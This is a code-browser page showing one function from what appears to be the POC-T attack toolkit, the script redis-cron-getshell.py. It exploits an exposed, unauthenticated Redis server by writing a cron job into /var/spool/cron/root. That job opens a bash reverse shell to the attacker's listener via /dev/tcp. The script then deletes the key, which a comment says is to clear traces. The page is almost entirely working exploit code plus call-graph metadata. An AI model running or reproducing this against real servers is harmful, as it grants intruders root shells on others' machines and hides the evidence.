MCPcopy
hub / github.com/Xyntax/POC-T / poc

Function poc

script/redis-cron-getshell.py:19–39  ·  view source on GitHub ↗
(url)

Source from the content-addressed store, hash-verified

17
18
19def poc(url):
20 url = host2IP(url)
21 ip = url.split(':')[0]
22 port = int(url.split(':')[-1]) if ':' in url else 6379
23 try:
24 r = redis.Redis(host=ip, port=port, db=0, socket_timeout=10)
25 if 'redis_version' in r.info():
26 payload = '\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/{ip}/{port} 0>&1\n\n'.format(ip=listen_ip,port=str(listen_port))
27 path = '/var/spool/cron'
28 name = 'root'
29 key = randomString(10)
30 r.set(key, payload)
31 r.config_set('dir', path)
32 r.config_set('dbfilename', name)
33 r.save()
34 r.delete(key) # 清除痕迹
35 r.config_set('dir', '/tmp')
36 return True
37 except Exception:
38 return False
39 return False

Callers

nothing calls this directly

Calls 7

host2IPFunction · 0.90
randomStringFunction · 0.90
splitMethod · 0.80
infoMethod · 0.80
formatMethod · 0.80
setMethod · 0.80
deleteMethod · 0.80

Tested by

no test coverage detected